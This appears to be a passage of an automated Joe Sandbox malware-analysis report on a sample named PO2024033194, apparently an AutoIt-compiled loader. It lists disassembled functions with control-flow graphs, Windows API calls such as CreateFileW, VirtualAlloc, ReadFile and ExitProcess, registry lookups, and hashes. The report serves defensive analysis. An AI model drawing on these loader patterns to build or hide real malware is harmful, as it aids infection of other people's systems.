                                                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                  Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc
                                                                  • String ID: Default
                                                                  • API String ID: 1579825452-753088835
                                                                  • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                  • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                  Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1054 40f5c0-40f5cf call 422240 1057 40f5d0-40f5e8 1054->1057 1057->1057 1058 40f5ea-40f613 call 413650 call 410e60 1057->1058 1063 40f614-40f633 call 414d04 1058->1063 1066 40f691 1063->1066 1067 40f635-40f63c 1063->1067 1068 40f696-40f69c 1066->1068 1069 40f660-40f674 call 4150d1 1067->1069 1070 40f63e 1067->1070 1073 40f679-40f67c 1069->1073 1072 40f640 1070->1072 1074 40f642-40f650 1072->1074 1073->1063 1075 40f652-40f655 1074->1075 1076 40f67e-40f68c 1074->1076 1079 40f65b-40f65e 1075->1079 1080 425d1e-425d3e call 4150d1 call 414d04 1075->1080 1077 40f68e-40f68f 1076->1077 1078 40f69f-40f6ad 1076->1078 1077->1075 1082 40f6b4-40f6c2 1078->1082 1083 40f6af-40f6b2 1078->1083 1079->1069 1079->1072 1090 425d43-425d5f call 414d30 1080->1090 1085 425d16 1082->1085 1086 40f6c8-40f6d6 1082->1086 1083->1075 1085->1080 1088 425d05-425d0b 1086->1088 1089 40f6dc-40f6df 1086->1089 1088->1074 1091 425d11 1088->1091 1089->1075 1090->1068 1091->1085
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_fseek_memmove_strcat
                                                                  • String ID: AU3!$EA06
                                                                  • API String ID: 1268643489-2658333250
                                                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                  Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1094 401100-401111 1095 401113-401119 1094->1095 1096 401179-401180 1094->1096 1098 401144-40114a 1095->1098 1099 40111b-40111e 1095->1099 1096->1095 1097 401182 1096->1097 1100 40112c-401141 DefWindowProcW 1097->1100 1102 401184-40118e call 401250 1098->1102 1103 40114c-40114f 1098->1103 1099->1098 1101 401120-401126 1099->1101 1101->1100 1105 42b038-42b03f 1101->1105 1111 401193-40119a 1102->1111 1106 401151-401157 1103->1106 1107 40119d 1103->1107 1105->1100 1110 42b045-42b059 call 401000 call 40e0c0 1105->1110 1108 401219-40121f 1106->1108 1109 40115d 1106->1109 1112 4011a3-4011a9 1107->1112 1113 42afb4-42afc5 call 40f190 1107->1113 1108->1101 1116 401225-42b06d call 468b0e 1108->1116 1114 401163-401166 1109->1114 1115 42b01d-42b024 1109->1115 1110->1100 1112->1101 1119 4011af 1112->1119 1113->1111 1121 42afe9-42b018 call 40f190 call 401a50 1114->1121 1122 40116c-401172 1114->1122 1115->1100 1120 42b02a-42b033 call 4370f4 1115->1120 1116->1111 1119->1101 1126 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1119->1126 1127 4011db-401202 SetTimer RegisterWindowMessageW 1119->1127 1120->1100 1121->1100 1122->1101 1130 401174-42afde call 45fd57 1122->1130 1127->1111 1128 401204-401216 CreatePopupMenu 1127->1128 1130->1100 1145 42afe4 1130->1145 1145->1111
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                  • CreatePopupMenu.USER32 ref: 00401204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                  Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1146 4115d7-4115df 1147 4115ee-4115f9 call 4135bb 1146->1147 1150 4115e1-4115ec call 411988 1147->1150 1151 4115fb-4115fc 1147->1151 1150->1147 1154 4115fd-41160e 1150->1154 1155 411610-41163b call 417fc0 call 41130a 1154->1155 1156 41163c-411656 call 4180af call 418105 1154->1156 1155->1156
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                  • std::exception::exception.LIBCMT ref: 00411626
                                                                  • std::exception::exception.LIBCMT ref: 00411640
                                                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                  • String ID: ,*H$4*H$@fI
                                                                  • API String ID: 615853336-1459471987
                                                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                  Function 041656E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1165 41656e0-416578e call 41630d0 1168 4165795-41657bb call 41665f0 CreateFileW 1165->1168 1171 41657c2-41657d2 1168->1171 1172 41657bd 1168->1172 1180 41657d4 1171->1180 1181 41657d9-41657f3 VirtualAlloc 1171->1181 1173 416590d-4165911 1172->1173 1174 4165953-4165956 1173->1174 1175 4165913-4165917 1173->1175 1177 4165959-4165960 1174->1177 1178 4165923-4165927 1175->1178 1179 4165919-416591c 1175->1179 1184 41659b5-41659ca 1177->1184 1185 4165962-416596d 1177->1185 1186 4165937-416593b 1178->1186 1187 4165929-4165933 1178->1187 1179->1178 1180->1173 1182 41657f5 1181->1182 1183 41657fa-4165811 ReadFile 1181->1183 1182->1173 1188 4165813 1183->1188 1189 4165818-4165858 VirtualAlloc 1183->1189 1192 41659cc-41659d7 VirtualFree 1184->1192 1193 41659da-41659e2 1184->1193 1190 4165971-416597d 1185->1190 1191 416596f 1185->1191 1194 416593d-4165947 1186->1194 1195 416594b 1186->1195 1187->1186 1188->1173 1196 416585f-416587a call 4166840 1189->1196 1197 416585a 1189->1197 1198 4165991-416599d 1190->1198 1199 416597f-416598f 1190->1199 1191->1184 1192->1193 1194->1195 1195->1174 1205 4165885-416588f 1196->1205 1197->1173 1202 416599f-41659a8 1198->1202 1203 41659aa-41659b0 1198->1203 1201 41659b3 1199->1201 1201->1177 1202->1201 1203->1201 1206 41658c2-41658d6 call 4166650 1205->1206 1207 4165891-41658c0 call 4166840 1205->1207 1212 41658da-41658de 1206->1212 1213 41658d8 1206->1213 1207->1205 1215 41658e0-41658e4 CloseHandle 1212->1215 1216 41658ea-41658ee 1212->1216 1213->1173 1215->1216 1217 41658f0-41658fb VirtualFree 1216->1217 1218 41658fe-4165907 1216->1218 1217->1218 1218->1168 1218->1173
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 041657B1
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 041659D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                  • Instruction ID: e67b420ed82f04f8cf5db20fa8b905e3c0f4d740f591eeb78ae1c3637c3f7163
                                                                  • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                  • Instruction Fuzzy Hash: 2AA12A70E00209EBDB14CFA4D994BEEB7B6FF48314F208599E506BB280D775AA50CF94
                                                                  Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1222 427190-4271ae RegQueryValueExW 1219->1222 1223 40e4eb-40e4f0 1219->1223 1224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1222->1224 1225 42721a-42722a RegCloseKey 1222->1225 1230 427210-427219 call 436508 1224->1230 1231 4271f7-42720e call 402160 1224->1231 1230->1225 1231->1230
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpen
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                  • API String ID: 1586453840-614718249
                                                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                  Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1236 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                  Function 04165480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1237 4165480-41655d4 call 41630d0 call 4165370 CreateFileW 1244 41655d6 1237->1244 1245 41655db-41655eb 1237->1245 1246 416568b-4165690 1244->1246 1248 41655f2-416560c VirtualAlloc 1245->1248 1249 41655ed 1245->1249 1250 4165610-4165627 ReadFile 1248->1250 1251 416560e 1248->1251 1249->1246 1252 416562b-4165665 call 41653b0 call 4164370 1250->1252 1253 4165629 1250->1253 1251->1246 1258 4165667-416567c call 4165400 1252->1258 1259 4165681-4165689 ExitProcess 1252->1259 1253->1246 1258->1259 1259->1246
                                                                  APIs
                                                                    • Part of subcall function 04165370: Sleep.KERNELBASE(000001F4), ref: 04165381
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 041655CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2170735362.0000000004163000.00000040.00000020.00020000.00000000.sdmp, Offset: 04163000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4163000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: 9L5IDN2UEQPKVDMESQ7CQ715
                                                                  • API String ID: 2694422964-4101757676
                                                                  • Opcode ID: 458379b02acd664884a3d0b1d9d5c3d3eea1da82dde71d9728182f9268300383
                                                                  • Instruction ID: b048af33a260c5dbaf4f5d31b3b5ad7c2a7d014cca4e44cb91faf6febdfce1b5
                                                                  • Opcode Fuzzy Hash: 458379b02acd664884a3d0b1d9d5c3d3eea1da82dde71d9728182f9268300383
                                                                  • Instruction Fuzzy Hash: 8A61B270D04288EBEF11DBA4D854BEEBBB5AF14304F004199E609BB2C1D7BA5B45CBA5
                                                                  Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Close$OpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 1607946009-824357125
                                                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                  Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                  • _wcsncpy.LIBCMT ref: 004102ED
                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                  • _wcsncpy.LIBCMT ref: 00410340
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                  • String ID:
                                                                  • API String ID: 3170942423-0
                                                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                  Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #v
                                                                  • API String ID: 0-554117064
                                                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                  Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
